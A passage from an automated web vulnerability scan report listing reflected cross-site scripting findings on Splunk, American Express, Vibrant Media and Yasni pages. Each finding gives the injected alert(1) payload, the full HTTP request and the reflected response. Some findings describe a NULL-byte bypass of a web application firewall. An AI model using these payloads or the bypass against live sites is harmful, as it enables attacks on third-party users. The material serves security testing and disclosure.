GET /b7936--><script>alert(1)</script>598904f8a80 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 16:15:24 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18271
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b31a7"><script>alert(1)</script>dcf6a3828c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wikib31a7"><script>alert(1)</script>dcf6a3828c3 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="lt ...[SNIP]... <a href="http://www.splunk.com/index.php?module=roles&func=showloginform&redirecturl=http://www.splunk.com/wikib31a7"><script>alert(1)</script>dcf6a3828c3"> ...[SNIP]...
4.630. http://www.splunk.com/wiki [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /wiki
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 671a4"><script>alert(1)</script>b97d19aca39 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wiki?671a4"><script>alert(1)</script>b97d19aca39=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 1 is copied into an HTML comment. The payload 5d79e--><script>alert(1)</script>01e99964339 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /5d79e--><script>alert(1)</script>01e99964339/ HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8a7d"><script>alert(1)</script>25cf03b96 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wikia8a7d"><script>alert(1)</script>25cf03b96/ HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="lt ...[SNIP]... <a href="http://www.splunk.com/index.php?module=roles&func=showloginform&redirecturl=http://www.splunk.com/wikia8a7d"><script>alert(1)</script>25cf03b96/"> ...[SNIP]...
4.633. http://www.splunk.com/wiki/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /wiki/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5aa3"><script>alert(1)</script>5ac65bd0135 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wiki/?f5aa3"><script>alert(1)</script>5ac65bd0135=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of the ipid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58b7c"><script>alert(1)</script>3fc5507d4ef was submitted in the ipid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /whatisIntelliTXT.asp?ipid=${ipid}58b7c"><script>alert(1)</script>3fc5507d4ef&cc=${cc}&server=${itxtserver} HTTP/1.1 Host: www.vibrantmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 92299 Content-Type: text/html Server: Microsoft-IIS/7.5 Set-Cookie: ASPSESSIONIDQADSARBD=OEOFFMCCAJGDINNJNMLCLBJJ; path=/ p3p: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" X-Powered-By: ASP.NET Date: Sat, 05 Feb 2011 22:20:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <titl ...[SNIP]... <input type="hidden" name="IPID" value="${ipid}58b7c"><script>alert(1)</script>3fc5507d4ef"> ...[SNIP]...
4.635. http://www.yasni.de/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.yasni.de
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46fac"><script>alert(1)</script>e05d79885fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?46fac"><script>alert(1)</script>e05d79885fa=1 HTTP/1.1 Host: www.yasni.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" ...[SNIP]... <a href="http://www.yasni.com/?46fac"><script>alert(1)</script>e05d79885fa=1" id="region_selector_1"> ...[SNIP]...
4.636. http://www201.americanexpress.com/business-credit-cards/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www201.americanexpress.com
Path:
/business-credit-cards/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51791"%3balert(1)//2c5fab680ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 51791";alert(1)//2c5fab680ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-credit-cards/?51791"%3balert(1)//2c5fab680ef=1 HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <title>OPEN from Amer ...[SNIP]... <script type="text/javascript"> var aj_queryString = "51791";alert(1)//2c5fab680ef=1"; </script> ...[SNIP]...
4.637. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www201.americanexpress.com
Path:
/business-credit-cards/business-credit-cards
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d3c5c"><script>alert(1)</script>9d3d18fb0de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d3c5c"><script>alert(1)</script>9d3d18fb0de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /business-credit-cards/business-credit-cards?%00d3c5c"><script>alert(1)</script>9d3d18fb0de=1 HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
4.638. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www201.americanexpress.com
Path:
/business-credit-cards/business-credit-cards
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5066f"%3balert(1)//690f9898938 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5066f";alert(1)//690f9898938 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-credit-cards/business-credit-cards?5066f"%3balert(1)//690f9898938=1 HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the source request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11129"%3balert(1)//b90a4cedfda was submitted in the source parameter. This input was echoed as 11129";alert(1)//b90a4cedfda in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-credit-cards/business-credit-cards?source=footer_small_business_credit_cards11129"%3balert(1)//b90a4cedfda HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0076500"><script>alert(1)</script>a5c89817fba was submitted in the source parameter. This input was echoed as 76500"><script>alert(1)</script>a5c89817fba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /business-credit-cards/business-credit-cards?source=footer_small_business_credit_cards%0076500"><script>alert(1)</script>a5c89817fba HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the sj_tabToOpen request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 39d09%3balert(1)//115a6676ff2 was submitted in the sj_tabToOpen parameter. This input was echoed as 39d09;alert(1)//115a6676ff2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /getthecard/home?sj_tabToOpen=139d09%3balert(1)//115a6676ff2&inav=menu_cards_pc_choosecard HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:21:37 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296944497780574; path=/; expires=Tue, 09-Feb-16 22:21:37 GMT; domain=.americanexpress.com
Set-Cookie: JSESSIONID=00004_Nr3XAINdJiQ4686YkMRWA:10ue6mp18;Path=/
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 48599
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <script src="htt ...[SNIP]... <script type="text/javascript"> var sj_responseText=""; var sj_rsvpStatus=""; var sj_offerURL=""; var sj_rsvpAttempts= 0; var sj_pageContext="Prospect"; var sj_tabToOpen = 139d09;alert(1)//115a6676ff2; var sj_modalToOpen = "null"; var sj_servername = "www201.americanexpress.com"; </script> ...[SNIP]...
4.642. http://zh-hans.splunk.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://zh-hans.splunk.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a66ee--><script>alert(1)</script>025dd4411ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?a66ee--><script>alert(1)</script>025dd4411ca=1 HTTP/1.1
Host: zh-hans.splunk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into an HTML comment. The payload 9c7aa--><script>alert(1)</script>a53113444e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 2 is copied into an HTML comment. The payload 84a20--><script>alert(1)</script>2a86be04e00 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 1 is copied into an HTML comment. The payload 46954--><script>alert(1)</script>05131f54977 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 2 is copied into an HTML comment. The payload d75ee--><script>alert(1)</script>e4c16a81498 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 3 is copied into an HTML comment. The payload 7e755--><script>alert(1)</script>b7071ccc3b1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 4 is copied into an HTML comment. The payload ee6a6--><script>alert(1)</script>abc43d08165 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
4.649. http://zh-hant.splunk.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://zh-hant.splunk.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload fa491--><script>alert(1)</script>4e7b580ded4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?fa491--><script>alert(1)</script>4e7b580ded4=1 HTTP/1.1
Host: zh-hant.splunk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into an HTML comment. The payload 882df--><script>alert(1)</script>c4b14aa1456 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 2 is copied into an HTML comment. The payload f592a--><script>alert(1)</script>443b4bd4ac9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 1 is copied into an HTML comment. The payload c22a7--><script>alert(1)</script>3c3d1be04b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 2 is copied into an HTML comment. The payload 2c14d--><script>alert(1)</script>ea57f7f43db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 3 is copied into an HTML comment. The payload c1940--><script>alert(1)</script>76ff7075169 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 4 is copied into an HTML comment. The payload 9e8a1--><script>alert(1)</script>9235d6443a5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95846"-alert(1)-"09f37818470 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
